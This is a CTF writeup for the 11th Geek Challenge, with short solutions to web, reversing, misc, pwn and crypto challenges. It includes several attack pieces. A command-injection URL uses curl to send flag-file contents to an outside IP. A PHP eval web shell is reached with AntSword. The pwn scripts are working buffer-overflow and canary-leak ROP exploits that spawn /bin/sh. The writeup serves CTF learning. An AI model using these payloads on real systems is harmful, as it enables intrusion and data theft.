11th Geek Challenge (极客大挑战) writeup

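  • Web
    • A Friend's Junior Schoolmate (朋友的学妹)
    • EZwww
    • Liu Zhuang's Defaced Page (刘壮的黑页)
    • Welcome
    • EZgit
    • I Am a Big Hacker (我是大黑客)
    • ezbypass
    • Zhi-X-Tang's PHP Tutorial (知X堂的php教程)
  • Re
    • No RE no gain
    • I Really Can't Write Drivers! (我真不会写驱动!)
    • WhatsApk
    • HelloAndroid
    • re00
    • maze
    • Hello .NET
  • Misc
    • One "Page" Blocks the View (一“页”障目)
    • Zhuang's Words (壮言壮语)
    • Secret Technique: Jumping Back and Forth (秘技·反复横跳)
    • Let's Do a Jigsaw (来拼图)
  • Pwn
    • How's Your Math? (数学咋样?)
    • runcode
    • liuzhuang-secret
    • baby_canary
  • Crypto
    • WWII Intelligence Officer Liu Zhuang (二战情报员刘壮)
    • Armor and Shaman (铠甲与萨满)
    • Chengdu Pig Farm No. 2 (成都养猪二厂)
    • Working by the Rules (规规矩矩的工作)
    • babyRSA
    • 韡髻猊岈 (Weijiniya)
    • Dancing Fingertips (跳跃的指尖)
    • childRSA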

Web

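A Friend's Junior Schoolmate (朋友的学妹)

Press F12, find the comment in the page source, and base64-decode it.

EZwww

Append www.zip to the URL to download the source code.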

<?php
$key1 = $_POST['a'];
$key2 = base64_decode('c3ljbDB2ZXI=');
if($key1 === $key2)
{//this is a true flag
echo '<p>SYC{xxxxxxxxxxxxxxxxxx}</p>';
}
?>

Send a=sycl0ver as a POST parameter.

Liu Zhuang's Defaced Page (刘壮的黑页)

<?php
include("flag.php");
highlight_file(__FILE__);
$username = $_GET['username'];
$passwd = $_POST['passwd'];
if ($username === 'admin' && $passwd === 'syclover') {
    echo $flag;
}
?>

Send username=admin via GET and passwd=syclover via POST.

Welcome

Capture the request in Burp Suite and change GET to POST.

<?php
error_reporting(0);
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    header("HTTP/1.1 405 Method Not Allowed");
    exit();
} else {
    if (!isset($_POST['roam1']) || !isset($_POST['roam2'])) {
        show_source(__FILE__);
    } else if ($_POST['roam1'] !== $_POST['roam2'] && sha1($_POST['roam1']) === sha1($_POST['roam2'])) {
        phpinfo();  // collect information from phpinfo!
    }
}

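POST roam1[]=1&roam2[]=2 to get the phpinfo output. In PHP 7 and earlier, sha1() returns NULL when given an array, so the two hashes compare equal while the arrays themselves differ.

Append f1444aagggg.php to the URL, capture the request in Burp Suite, send it to Repeater, and send it again.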

EZgit

Use GitHacker:

python GitHacker.py http://47.100.46.169:3902/.git/

I Am a Big Hacker (我是大黑客)

Append liuzhuang.php.bak to the URL.

<?php
eval($_POST['liuzhuang']);// Who is the big villain? That must be me, liuzhuang
// When your server sees 0xliuzhuang, you know it is time to buy a new machine
?>

Connect with AntSword.

The flag is in the root directory.

ezbypass

Send a[]=1&b=1 via GET.

Send c=123a via POST.

Zhi-X-Tang's PHP Tutorial (知X堂的php教程)

47.94.239.194:8082/listdir.php?dirname=JN;curl 175.24.81.163:14444 -d `find / -name flag`

47.94.239.194:8082/listdir.php?dirname=JN;curl 175.24.81.163:14444 -d `cat /flagggggggggggggg_1s_here/flag`

Re

No RE no gain

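I Really Can't Write Drivers! (我真不会写驱动!)

WhatsApk

Open the APK in JEB; the flag is in the strings.xml file in the values folder under Resources.

HelloAndroid

Open the APK in JEB and search for SYC in the strings view to get the flag.

re00

Export the byte_4060 array and XOR each byte with 0x44: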

a = [23,  29,   7,  63,  55,  45,  41,  52,  40,  33, 27,  55,  45,  41,  52,  40,  33,  27,  60,  43, 54,  54,  54,  27,  54,  45,  35,  44,  48, 123, 123,  57]
for i in a:print(chr(i^0x44),end='')

maze

Hello .NET

// WpfAppCS.MainWindow
using System.Collections.Generic;
using System.Windows;
using System.Windows.Media;

private void Check(object sender, RoutedEventArgs e)
{
    string text = InputBox.Text;
    List<int> list = new List<int>();
    int[] array = new int[22]{18,14,40,-14,-2,30,10,42,35,48,43,49,52,72,57,68,86,145,115,128,115,86};
    int num = 99;
    // Collect one prime (searching upward from 99) per input character
    while (list.Count < text.Length) {
        bool flag = true;
        for (int i = 3; i < num; i += 2) {
            if (num % i == 0) {
                flag = false;
                break;
            }
        }
        if (flag) {
            list.Add(num);
        }
        num += 2;
    }
    // Each character must satisfy prime - character == array entry
    bool flag2 = true;
    for (num = 0; num < text.Length && num < array.Length; num++) {
        if (list[num] - text[num] != array[num]) {
            flag2 = false;
            break;
        }
    }
    if (text.Length == array.Length && flag2) {
        Status.Foreground = new SolidColorBrush(Colors.Green);
        Status.Text = "Flag is corrent";
    } else {
        Status.Foreground = new SolidColorBrush(Colors.Red);
        Status.Text = "Flag is incorrent";
    }
}
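
The check in the decompiled method can be inverted directly: character i of the input is the i-th prime found above 99 minus array[i]. The script below is an added example, not part of the original writeup; it rebuilds the prime list the same way the C# loop does, and its function names are illustrative.

```python
# Added example: invert the Check() routine from the decompiled code above.
# ARRAY is copied from the decompiled method; function names are illustrative.
ARRAY = [18, 14, 40, -14, -2, 30, 10, 42, 35, 48, 43,
         49, 52, 72, 57, 68, 86, 145, 115, 128, 115, 86]


def primes_like_check(count, start=99):
    """Reproduce the C# loop: walk odd numbers from `start` and keep those
    with no odd divisor in [3, num)."""
    found, num = [], start
    while len(found) < count:
        if all(num % i for i in range(3, num, 2)):
            found.append(num)
        num += 2
    return found


def recover_flag(array=ARRAY):
    """Check() requires list[i] - text[i] == array[i],
    so text[i] = list[i] - array[i]."""
    primes = primes_like_check(len(array))
    return ''.join(chr(p - a) for p, a in zip(primes, array))


def check(text, array=ARRAY):
    """Python port of the C# comparison, used to confirm the result."""
    primes = primes_like_check(len(text))
    return len(text) == len(array) and all(
        p - ord(ch) == a for p, ch, a in zip(primes, text, array))


if __name__ == "__main__":
    flag = recover_flag()
    print(flag, check(flag))
```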

Misc

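One "Page" Blocks the View (一“页”障目)

Concatenate the two strings on the flyer.

Zhuang's Words (壮言壮语)

Decode with the 与佛论禅 ("Talking Zen with the Buddha") encoding.

Secret Technique: Jumping Back and Forth (秘技·反复横跳)

Run foremost, then restore the QR code by hand.

Let's Do a Jigsaw (来拼图)

Pick out the images that contain parts of the flag and piece them together.

Pwn

How's Your Math? (数学咋样?)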

from pwn import *
context.log_level = 'debug'
p = remote("81.69.0.47",1111)
p.recvuntil(b"I have 20 tests")
for i in range(20):
    # Parse num_1 and num_2 from each prompt line and reply with their sum
    p.recvuntil(("![" + str(i) + "]  ").encode())
    temp = p.recvline()
    num_1 = int(temp[temp.find(b"num_1 = ")+8:temp.find(b"num_2 = ")-2], 10)
    num_2 = int(temp[temp.find(b"num_2 = ")+8:])
    p.sendline(str(num_1+num_2).encode())
p.recvall()

runcode

#include<stdio.h>
int a=0;
char b,c[100];
int main()
{
    /* Read and print the first three lines of the flag file */
    FILE *fp1 = fopen("/home/ctf/flag","r");
    fgets(c,100,fp1); puts(c);
    fgets(c,100,fp1); puts(c);
    fgets(c,100,fp1); puts(c);
    fclose(fp1);
    return 0;
}

liuzhuang-secret

from pwn import *
context.log_level = 'debug'
p = remote("81.69.0.47",1000)
payload = b'a'*0x78 + p64(0x40079B)  # bytes literal so the concatenation with p64() works on Python 3
p.sendlineafter("My house is quite big, Do you want to play with me?",payload)
p.interactive()

baby_canary

from pwn import *
context.log_level = "debug"
local = 0
if local == 1:
    r = process('./baby_canary')
    gdb.attach(r, 'b * 0x0400789')
else:
    r = remote('81.69.0.47', 3333)
elf = ELF('./baby_canary')
rdi = 0x400873  # gadget address used to load rdi
system = elf.symbols['system']
binsh = next(elf.search(b'/bin/sh'))
# Fill 0x68 bytes; the newline added by sendline lands on the canary's low byte
r.sendline(cyclic(0x68))
r.recvuntil(b'zaab')
canary = u64(r.recv(8)) - 0xa  # subtract the 0x0a newline to restore the low byte
print(hex(canary))
print(hex(u64(r.recv(6) + b'\x00\x00')))
r.sendline(cyclic(0x68) + p64(canary) + p64(0xdeadbeef) + p64(rdi) + p64(binsh) + p64(system))
r.interactive()

Crypto

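WWII Intelligence Officer Liu Zhuang (二战情报员刘壮)

Morse code.

Armor and Shaman (铠甲与萨满)

Caesar cipher.

Chengdu Pig Farm No. 2 (成都养猪二厂)

Pigpen cipher + rail fence cipher.

Working by the Rules (规规矩矩的工作)

Hill cipher: invert the key matrix, then multiply the inverse by the vector formed from three numbers; the three resulting numbers map to three letters.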
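
A worked instance of the Hill cipher procedure described above, as an added example that is not from the original writeup: the 3x3 key is inverted modulo 26 via the adjugate and applied to each three-letter block. KEY and the sample text are constructed values (assuming the usual A=0..Z=25 alphabet), since the challenge's key and ciphertext are not given on this page.

```python
# Added example: Hill cipher with a 3x3 key, arithmetic mod 26.
# KEY and the sample text are constructed, not the challenge's data.
M = 26
KEY = [[6, 24, 1], [13, 16, 10], [20, 17, 15]]


def det3(k):
    """Determinant of a 3x3 integer matrix (cofactor expansion, row 0)."""
    return (k[0][0] * (k[1][1] * k[2][2] - k[1][2] * k[2][1])
            - k[0][1] * (k[1][0] * k[2][2] - k[1][2] * k[2][0])
            + k[0][2] * (k[1][0] * k[2][1] - k[1][1] * k[2][0]))


def inverse_mod(k, m=M):
    """Inverse of a 3x3 matrix mod m via the adjugate.
    Raises ValueError when det(k) has no inverse mod m (unusable key)."""
    det_inv = pow(det3(k) % m, -1, m)
    inv = [[0] * 3 for _ in range(3)]
    for r in range(3):
        for c in range(3):
            # Cyclic row/column indices yield the signed cofactor directly
            r1, r2 = (r + 1) % 3, (r + 2) % 3
            c1, c2 = (c + 1) % 3, (c + 2) % 3
            cof = k[r1][c1] * k[r2][c2] - k[r1][c2] * k[r2][c1]
            inv[c][r] = cof * det_inv % m  # transposed: adjugate entry
    return inv


def apply(matrix, text, m=M):
    """Multiply each 3-letter block (A=0..Z=25) by `matrix` mod m."""
    nums = [ord(ch) - ord('A') for ch in text]
    out = []
    for i in range(0, len(nums), 3):
        block = nums[i:i + 3]
        out += [sum(row[j] * block[j] for j in range(3)) % m
                for row in matrix]
    return ''.join(chr(n + ord('A')) for n in out)


if __name__ == "__main__":
    cipher = apply(KEY, "ACT")                   # encrypt a sample block
    print(cipher, apply(inverse_mod(KEY), cipher))  # decrypt it again
```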

babyRSA

from Crypto.Util.number import *
from gmpy2 import *
from secret import p,flag
flag = bytes_to_long(bytes(flag,encoding='utf-8'))
q = getPrime(1024)
n = q*p
phi_ = (p-1)*(q-1)
e = 0x10001
d = invert(e,phi_)
c = (pow(flag, e, n))
print(long_to_bytes(pow(c, d, n)))
print((c,q,n))
'''out put
(177177672061025662936587345347268313127241651965256882323180749317515733256088163186914550682635245294414879862810654773207644687262596440870094409378849307188485755700138797651039936445998433830516207630858733090581643592843521203499818069822504434370840254518614785953412492701730326524258672860416318501278155194, 166836705584681518148179737955842605213272207836752187845124149461151181903779374775281529346854786259719545699157508885500818994019618158708212777833768444327658647324555090459233657737950932895018766440119999513331707759691054888319029069397903003240927552065429412176600134636921146805408664505115889561043, 191051885543358947736760989661967468461742175898801910645529003886391047898839624568290216360845330501814019720570327197669064365268607597117598905046895097642708006373182989953758208523010345148200475257538336602695211819055893667974317905617522838840325499754862033348148407978527792816186094297381925119601464149)
'''
# Solution: q is printed together with c and n, so p = n // q and d can be computed directly
import gmpy2
import libnum
c = 177177672061025662936587345347268313127241651965256882323180749317515733256088163186914550682635245294414879862810654773207644687262596440870094409378849307188485755700138797651039936445998433830516207630858733090581643592843521203499818069822504434370840254518614785953412492701730326524258672860416318501278155194
e = 65537
q = 166836705584681518148179737955842605213272207836752187845124149461151181903779374775281529346854786259719545699157508885500818994019618158708212777833768444327658647324555090459233657737950932895018766440119999513331707759691054888319029069397903003240927552065429412176600134636921146805408664505115889561043
n = 191051885543358947736760989661967468461742175898801910645529003886391047898839624568290216360845330501814019720570327197669064365268607597117598905046895097642708006373182989953758208523010345148200475257538336602695211819055893667974317905617522838840325499754862033348148407978527792816186094297381925119601464149
p = n // q
d = gmpy2.invert(e, (p-1)*(q-1))
m = pow(c, d, n)
print(libnum.n2s(m))

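韡髻猊岈 (Weijiniya)

Solve it with the Vigenère solver at https://www.guballa.de/vigenere-solver

Dancing Fingertips (跳跃的指尖)

Take the letter that each group of letters encloses on the keyboard.

childRSA

Low public exponent broadcast attack: the same message is encrypted with e = 3 under three different moduli, so the CRT combines the ciphertexts and an integer cube root recovers the message.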

from gmpy2 import *

def my_parse_number(number):
    # Convert the recovered integer to its byte string, two hex digits at a time
    string = "%x" % number
    if len(string) % 2:  # pad to a whole number of bytes
        string = "0" + string
    erg = []
    while string != '':
        erg = erg + [chr(int(string[:2], 16))]
        string = string[2:]
    return ''.join(erg)

def extended_gcd(a, b):
    x, y = 0, 1
    lastx, lasty = 1, 0
    while b:
        a, (q, b) = b, divmod(a, b)
        x, lastx = lastx - q*x, x
        y, lasty = lasty - q*y, y
    return (lastx, lasty, a)

def chinese_remainder_theorem(items):
    N = 1
    for a, n in items:
        N *= n
    result = 0
    for a, n in items:
        m = N // n
        r, s, d = extended_gcd(n, m)
        if d != 1:
            # Skip moduli that are not coprime to the rest (integer division keeps N exact)
            N = N // n
            continue
        result += a*s*m
    return result % N, N

sessions=[{"c": 0xff24bddc5a7b327535af92dba58c5d62a22d542e6ba1df6f91c98c7563d8e48e770fb623bfcc2f09ed49788293306ff709670b225da32ea134422d5e403b11c39ef6b144f96b2fe94b3aa136432ecea86a4069a4cb0b4d8570edb3fb5bb2cf0693184ef0c589887b012ebe6ea94e854a71a7eb768133d15e784e388976877db, "e": 3, "n": 0xe096219878f492bcdb2a2d03995521e7a65125733bae18e7d0005e35343fea3653698de60231d29b2d1b44a0b4ffd3183855b9042275f769e1702fa8843062df0938821db0258af40ab3cda8e54eb6ac826d545df91dfe76266cb01b1d6fad39e6ef13ce730c1c2395136b0bbdf22c6b0daba63701d71c6ae70d4e06935b9941},
{"c": 0x895f8283e2200bab1bf938ce3b5e42147b53a5178e436ea0b64a2380ba99776d5ba8046ef722858b20d9650ee68c09e905030f1634e0b32397b7b12236a5a301e5923a294ef1bdf16458f4fc8677370ce2ce3d0fd957da7466e5b104191d454455917147f3187b758c1c468db1b35514391e5b36bd1ac39e91bbb24fdbc07872, "e": 3, "n": 0xa36b15a395edf3e99927f658e22d5f4aefd83434972c96cca5242a1aaa517ad83739451269723092dd9e73c00682dd3bbd74a985546def88196119b6d57b397283bc7b8b6029916df84284bec1725f6e5d3d29042af685c508a58ab6fb4e5bfeb326ae49330e3f4426abc1860ca4412feb976ee571075a47b854c9a6f5f0ebff},
{"c": 0x3bead3d6760bff4de22562978d4722bb21ee4792ebdb32703b6df9ff5176e033e97ad8fc81467f4b3df7bd4e8bcae09462f3eca93a3da1cd9d7e8de3e464471fdd0b70112c1c738b0daa2a37a65331eaa8954b81b410f62a0280da32eb3e305782d5f774d814ca0adb13344687387cf72657dc21724bcf69da810d7635b99467, "e": 3, "n": 0x9d4732db2539d1166dc6865670be11951bf49295bc8c472f34682a0fb7f2b3ba96dcfa1945c2e4685dfeae5255abe2ab3b7fb2282971bb16ce02d14082f71755e8a65c956e114336914a409a9f1158fb362a92c4e169fa3c460ea26fb5c6693447b14f1c3156a2d9308dd993d7ea708a00ad149fb77109d8a5f77de1703ba249}]
data = []
for session in sessions:
    e = session['e']
    n = session['n']
    msg = session['c']
    data = data + [(msg, n)]
print("Please wait, performing CRT")
x, n = chinese_remainder_theorem(data)
e = session['e']
# x equals m**e over the integers, so the integer e-th root is the message
realnum = iroot(mpz(x), e)[0].digits()
print(my_parse_number(int(realnum)))
